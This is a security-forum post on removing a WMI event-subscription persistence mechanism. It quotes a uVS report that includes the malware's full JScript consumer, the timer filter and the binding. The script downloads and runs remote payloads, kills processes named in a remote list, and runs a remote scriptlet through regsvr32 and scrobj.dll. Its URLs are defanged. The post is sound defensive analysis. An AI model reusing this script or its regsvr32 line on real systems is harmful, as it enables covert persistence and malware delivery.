safety 8 Posted June 20, 2017 On the forum.esetnod32.ru forum we remove this kind of WMI-script persistence with Universal Virus Sniffer (uVS): https://forum.esetnod32.ru/forum6/topic14074/ The uVS report quoted below captures the whole WMI event subscription, not just the script: an ActiveScriptEventConsumer (youmm2_consumer, JScript engine) in \\.\root\subscription, an __EventFilter (youmm2_filter) whose WQL query selects __TimerEvent instances with timerid "youmm2_itimer", and the __FilterToConsumerBinding that links the two. All three objects must be deleted together — removing only the consumer leaves the filter and binding in place, and the filter's query also points at a timer instruction (TimerId youmm2_itimer) that is not shown in this report and should be looked for and removed in the same namespace. The script text itself provides the indicators to hunt for on other hosts: it fetches a process/file kill list from wmi.mykings.top:8888/kill.html and runs taskkill / deletes files from it, terminates rundll32.exe, waits toff (3000 ms), fetches a download list from wmi.mykings.top:8888/test.html and writes each item to disk with ADODB.Stream (optionally executing it), re-registers several COM DLLs, loads a remote scriptlet with regsvr32 /u /s /i:<url> scrobj.dll from js.mykings.top:280/v.sct, and starts rundll32.exe on c:\windows\debug\item.dat,ServiceMain. The URLs in the report appear to be defanged (the "][ттп://" prefix stands for "http://"); do not open them. Quote Полное имя WMI_ACTIVESCRIPTEVENTCONSUMER\YOUMM2_CONSUMER.[YOUMM2_FILTER] Имя файла YOUMM2_CONSUMER.[YOUMM2_FILTER] Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске Удовлетворяет критериям WMI_ACTIVESCRIPTEVENTCONSUMER(CONSUMER_NAME ~ YOUMM2_CONSUMER)(1) [delall (0)] Сохраненная информация на момент создания образа Статус в автозапуске Namespace \\.\root\subscription Consumer_Name youmm2_consumer Consumer_Class ActiveScriptEventConsumer Consumer_ScriptingEngine Jscript Consumer_ScriptText var toff=3000;var url1 = "][ттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="][ттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" 
",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:][ттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa"); Filter_Name youmm2_filter Filter_Class __EventFilter Filter_Query select * from __timerevent where timerid="youmm2_itimer" #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name="youmm2_consumer""; Filter = "\\\\.\\root\\subscription:__EventFilter.Name="youmm2_filter""; }; #MOF_Event# instance of __EventFilter { Name = "youmm2_filter"; Query = "select * from __timerevent where timerid="youmm2_itimer""; QueryLanguage = "wql"; };